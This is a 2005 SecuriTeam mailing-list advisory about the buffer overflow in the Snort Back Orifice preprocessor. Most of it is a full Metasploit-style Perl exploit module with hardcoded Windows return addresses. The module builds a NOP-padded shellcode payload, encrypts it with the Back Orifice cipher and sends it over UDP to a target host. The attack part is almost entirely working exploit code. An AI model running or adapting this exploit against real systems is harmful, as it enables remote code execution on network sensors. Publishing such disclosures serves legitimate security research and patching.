[EXPL] Snort Back Orifice Preprocessor Buffer Overflow (Exploit #2)

From: SecuriTeam (support_at_securiteam.com)
Date: 11/02/05

Next message: SecuriTeam: "[NT] Novell ZENworks Patch Management Server SQL injection"

Previous message: SecuriTeam: "[UNIX] up-imapproxy Format String Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 2 Nov 2005 10:02:19 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Snort Back Orifice Preprocessor Buffer Overflow (Exploit #2)
------------------------------------------------------------------------

SUMMARY

<http://www.snort.org/> Snort is a widely-deployed, open-source network
intrusion detection system (IDS). Snort preprocessors are modular plugins
that extend functionality by operating on packets before the detection
engine is run.

The Snort Back Orifice preprocessor contains a buffer overflow that could
allow a remote attacker to execute arbitrary code on a vulnerable system.

DETAILS

Vulnerable Systems:
* Snort versions 2.4.0 to 2.4.2
* Sourcefire Intrusion Sensors

Exploit:
################################
# for educational purpose only
# by Kira < trir00t [at] gmail.com >
################################
package Msf::Exploit::snort_bo_overflow_win32;
use base 'Msf::Exploit';
use strict;
use Pex::Text;

my $holdrand;
my $advanced = {};

my $info =
{
'Name' => 'Snort Back Orifice Preprocessor Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' => [ 'Trirat Puttaraksa (Kira) <trir00t [at] gmail.com>', ],
'Arch' => ['x86'],
'OS' => ['win32', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 53],
},

'Payload' => {
'Space' => 1024, # you can use more spaces
'BadChars' => "\x00",
},

'Description' => Pex::Text::Freeform(qq{
  This exploits the buffer overflow in Snort version
  2.4.0 to 2.4.2. This particular module is capable of
  exploiting the bug on x86 Win32, Win2000, WinXP and Win2003.
  Exploitation in this vulnerability is depend on many factors.
  Difference in GCC version, compiled option and
  operating system made diffent technique in exploitation.
}),

'Refs' => [
['URL ', "http://www.securiteam.com/exploits/6V00L1PEAU.html"],
],

'Targets' => [

["Snort 2.4.2 Binary on Windows XP Professional SP1", 0x77da54d4,
  (18+1024+1028+1024)],
["Snort 2.4.2 Binary on Windows XP Professional SP2", 0x77daacdb,
  (18+1024+1028+1024)],
["Snort 2.4.2 Binary on Windows Server 2003 SP1", 0x7d065177,
  (18+1024+1028+1024)],
["Snort 2.4.2 Binary on Windows Server 2000 SP0", 0x77e33f69,
  (18+1024+1028+1024)],
["Snort 2.4.2 Binary on Windows 2000 Professional SP0", 0x7850cdef,
  (18+1024+1028+1024)],
],

'Keys' => ['Snort'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced},
@_);
return ($self);
}

sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;

my $target = $self->Targets->[$target_idx];

if(! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the NOP module.");
return;
}

my $socket = Msf::Socket::Udp->new
  (
   'PeerAddr' => $target_host,
   'PeerPort' => $target_port,
   'LocalPort' => $self->GetVar('CPORT'),
  );

if($self->IsError) {
$self->PrintLine("[*] Error creating socket: " .
$socket->GetError);
}

$self->PrintLine(sprintf("[*] Trying " . $target->[0] . " using return
address 0x%.8x....", $target->[1]));

my $payload = "*!*QWTY?"; # Magic string: 8 bytes
$payload .= pack('V', $target->[2]); # Len: 4 bytes
$payload .= "\xed\xac\xef\x0d"; # UDP packet id
$payload .= "\x01"; # BO type (PING)
$payload .= "\x90" x 1024; # Data
$payload .= "\x90" x 1024; # offset to EIP
$payload .= pack('V', $target->[1]); # return address
$payload .= $shellcode; # our shellcode

$payload = bocrypt($payload); # encrypted payload

$self->PrintLine("[*] Sending Exploit....");
$socket->Send($payload);
}

sub bocrypt {
my $tmppayload = shift;
my @arrpayload = split(//, $tmppayload);
my $retpayload;
my $c;

msrand(31337);

foreach $c (@arrpayload) {
$retpayload .= chr((ord($c) ^ (mrand()%256)));
}
return ($retpayload);
}

sub msrand {
$holdrand = shift;
}

sub mrand {
return ((($holdrand = ($holdrand * 214013 + 2531011 & 0xffffffff)) >> 16)
& 0x7fff);
}

#EoF

ADDITIONAL INFORMATION

The information has been provided by <mailto:trir00t@gmail.com> Kira.
The advisory can be found at:
<http://www.securiteam.com/unixfocus/6W00M1PEAC.html>
http://www.securiteam.com/unixfocus/6W00M1PEAC.html

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[NT] Novell ZENworks Patch Management Server SQL injection"

Previous message: SecuriTeam: "[UNIX] up-imapproxy Format String Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[NEWS] Arkeia Network Backup Client Allows Unauthenticated Remote Access to Computer
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... The Arkeia Network Backup Client
allows a remote ... my $class = shift; ... sub Check { ...
(Securiteam)
[EXPL] Gecko InstallVersion.compareTo Code Execution (Exploit Metasploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... * Mozilla Suite version
1.7.8 and prior ... my $class = shift; ... sub Exploit ... (Securiteam)
[TOOL] Tattle - Automatic Reporting Of SSH Brute-Force Attacks
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... # which is a matching line of
the log, the single array is returned. ... my $mark = shift; ... sub writelogs
... (Securiteam)
[UNIX] Snort Back Orifice Preprocessor Buffer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Snort is a widely-deployed,
open-source network ... The vulnerable code will process any UDP packet that is not destined
to or ... The Snort Back Orifice preprocessor vulnerability can be triggered with a ...
(Securiteam)
[TOOL] SnortALog - Snort Analyzer Logs
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... SnortALog works with all
versions of SNORT and is ... the only script who can analyze snort's logs in all formats
(Syslog, ... (Securiteam)